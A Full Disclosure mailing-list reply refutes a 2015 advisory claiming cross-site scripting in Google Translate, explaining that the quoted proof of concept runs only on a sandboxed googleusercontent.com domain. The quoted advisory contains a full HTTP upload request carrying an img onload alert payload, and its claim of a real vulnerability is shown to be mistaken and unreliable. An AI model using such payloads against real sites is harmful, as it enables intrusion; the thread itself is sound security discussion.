Hi Francisco, Unfortunately your disclosure is factually wrong.
Please note that even the packet you are citing says "Host: translate.googleusercontent.com" - this is not the same domain as translate.google.es (or translate.google.com), therefore, due to the JavaScript same-origin policy ( https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) it's a different origin. Which means that scripts executed from translate.googleusercontent.com do not have access to cookies/DOM/etc of Google Translate main domains (translate.google.es, etc). And there are no interesting cookies / things to do on translate.googleusercontent.com. Given the above, as Google surely told you, you didn't find an XSS in Google Translate, you found an XSS in a sandbox domain, which was designed to allow execution of potentially hostile JavaScript code. Hey, you even can find the *.googleusercontent.com domain in Google's sandboxed domain listing: https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain Keep in mind that when doing XSS-related security research a popping out alert box tells you that you can execute code, but not if it's a vulnerability - for that you need to verify the domain (and maybe schema/port as well, depending on your case), e.g. by doing alert(document.domain) instead of alert('XSS en Google AUDIT') ;) Cheers, Gynvael On Fri, Nov 27, 2015 at 10:28 AM Francisco Javier Santiago Vázquez < franciscojaviersantiagovazq...@gmail.com> wrote: > I. VULNERABILITY > ------------------------- > Vulnerability Cross-Site Scripting Translator Google affected by Cross-Site > Scripting vulnerability (XSS) > Google assumes the vulnerability. > > > II. DESCRIPTION > ------------------------- > - Firstly, go to https://translate.google.es/?hl=es website and click in > "Document Translate" > - Upload the proof of concept > - Finally, we can display the Cross-Site Scripting (XSS) > > > III. PROOF OF CONCEPT > ------------------------- > POST /translate_f HTTP/1.1 > Host: translate.googleusercontent.com > User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101 > Firefox/39.0 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 > Accept-Encoding: gzip, deflate > Referer: https://translate.google.es/?hl=es > Connection: keep-alive > Content-Type: multipart/form-data; > boundary=---------------------------147452561017500 > Content-Length: 1095 > > -----------------------------147452561017500 > Content-Disposition: form-data; name="sl" > > en > -----------------------------147452561017500 > Content-Disposition: form-data; name="tl" > > es > -----------------------------147452561017500 > Content-Disposition: form-data; name="js" > > y > -----------------------------147452561017500 > Content-Disposition: form-data; name="prev" > > _t > -----------------------------147452561017500 > Content-Disposition: form-data; name="hl" > > es > -----------------------------147452561017500 > Content-Disposition: form-data; name="ie" > > UTF-8 > -----------------------------147452561017500 > Content-Disposition: form-data; name="text" > > > -----------------------------147452561017500 > Content-Disposition: form-data; name="file"; filename="poc.html" > Content-Type: text/html > > <img src=" > > http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg > " > onload="alert('XSS en Google AUDIT')"</img> > -----------------------------147452561017500 > Content-Disposition: form-data; name="edit-text" > > > -----------------------------147452561017500-- > > > IV. SYSTEMS AFFECTED > ------------------------- > The vulnerability affects the Google Translator. > > > VI. CREDITS > ------------------------- > These vulnerabilities have been discovered by > Francisco Javier Santiago Vázquez ( > https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050 > ). > (https://twitter.com/n0ipr0cs). > > > VII. DISCLOSURE TIMELINE > ------------------------- > Nov 02, 2015: Vulnerability acquired by Francisco Javier Santiago > Vázquez. aka "n0ipr0cs" > Nov 03, 2015 Responsible disclosure to Google Security Team. > Nov 03, 2015 Google assumes the vulnerability > Nov 26, 2015 Disclosure > > > VIII. Links > ------------------------ > POC :- > > http://www.estacion-informatica.com/2015/11/el-no-cross-site-scripting-de-google.html > > > > > > > > *Francisco Javier Santiago Vázquez Ethical Hacker and Forensic Analyst > < > http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6 > > > <http://estacioninformatica.blogspot.com.es/> > <https://twitter.com/n0ipr0cs>* > > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: http://seclists.org/fulldisclosure/ _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
